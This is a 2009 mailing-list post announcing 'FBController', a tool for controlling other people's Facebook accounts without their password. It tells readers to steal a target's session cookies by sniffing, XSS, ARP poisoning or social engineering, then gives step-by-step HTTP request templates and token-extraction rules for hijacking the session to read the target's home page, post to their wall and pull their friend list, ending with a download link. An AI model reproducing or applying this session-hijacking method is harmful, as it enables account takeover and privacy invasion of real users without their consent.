[WEB SECURITY] FBController - (Facebook Control Utility) version 1.0

QUAKER DOOMER quakerdoomer at inbox.lv
Thu Apr 30 16:31:53 EDT 2009


FBController - The Ultimate Utility to Control Facebook accounts without the 
Password.

Let me clear that this utility WON'T  hack/crack Facebook accounts.
The utility will need biscuits/cookies instead of the password.

Get the target's cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, 
scroogle search, anyhow !
Once you have the cookies you can use FBController and have Full control over the 
target's Facebook account.

==============================================================
Login to your Facebook account and sniff your cookie OR collect a few live Facebook 
Biscuit/s of your Target/s.

1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back older than 
FaceBook.COM's current SYSTIME.


2 ] Send a GET Request to www.facebook.com port 80 after calculating the required 
variables (below)
[code]
GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; 
test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; 
cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; 
login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); 
c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-
STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
FOREVER-FIXED-FOR-YOUR-ID); locale=en_US
[/code]


3 ] From the Response Obtained :
Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].

Calculating the new nctr[ct] :
Add +79 to Original Timestamp. Append 3 more digits to its end.

Calculating &oldest= :
Deduct 144556 from Original Timestamp.

Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other 
Post Request

Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other 
Post Request

Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post 
Request

Your login_x actually looks like
a:2:{s:5:"email";s:13:"you at youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged in the hex format.


4 ] Send a GET Request like below with the above calculated variables :
[code]
GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-
CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-
STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-
FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 
HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; 
test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; 
login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); 
c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-
STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F
%2Fwww.facebook.com%2Fhome.php
[/code]

5 ] In the output :
Search for  Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)


6 ] Generate a new POST Request with the above calculated new variables :
[code]
POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; 
test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; 
login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); 
c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-
HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A
%2F%2Fwww.facebook.com%2Fhome.php

action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-
ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-
STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-
FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-
RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-
CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-
FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-
EXPLAINED-In-POINT-3)375
[/code]


7 ] Use the above variables to view any content with the appropriate GET / requests


8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)


Looks like loads of HardWork ha ?
If you don't want to do all this manually, then you can download this TooL named 
FBController (FACEBOOK CONTROLLER)  written
by me. 
Till now FBController version 1.0 uses your Target's provided cookie and only :

A > Downloads the HomePage.
B > Allows you to Update the Target's Wall and
C > Retrieve your Target's Friend's List

There are many APIs available to write apps and 3rd party Tools for FB in Java, 
Perl, .NET, etc.

FBConTroller was entirely written without knowing any of Facebook's Dev API's.
Considering the above alongwith Facebook's complexity, the next version might take 
some time to get released

Many more features to come in version 2.0

A 26th April Release !
Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th April 
2009.

Happy Controlling ! :-)
==============================================================

Download : http://my.opera.com/quakerdoomer/blog/2009/04/30/fbcontroller-facebook-
controller-the-ultimate-facebook-controller-without-the-pa

The Latest available release is FBCONTROLLER version 1.0
Coded by : Azim Poonawala (QUAKERDOOMER)
Author's website : http://solidmecca.co.nr

Regards,
QUAKERDOOMER


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list